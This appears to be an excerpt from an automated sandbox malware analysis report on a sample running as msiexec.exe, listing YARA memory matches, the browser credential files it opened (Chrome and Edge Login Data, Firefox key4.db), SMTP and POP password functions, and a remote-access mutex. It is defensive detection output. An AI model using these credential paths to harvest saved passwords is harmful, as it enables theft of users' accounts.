Source: Yara match File source: 00000009.00000002.3406381912.0000000007BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 6448, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: ESMTPPassword 13_2_004033F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword 13_2_00402DB3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword 13_2_00402DB3
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 6448, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-UXHRJ7 Jump to behavior
Source: Yara match File source: 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3406381912.0000000007BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 6448, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs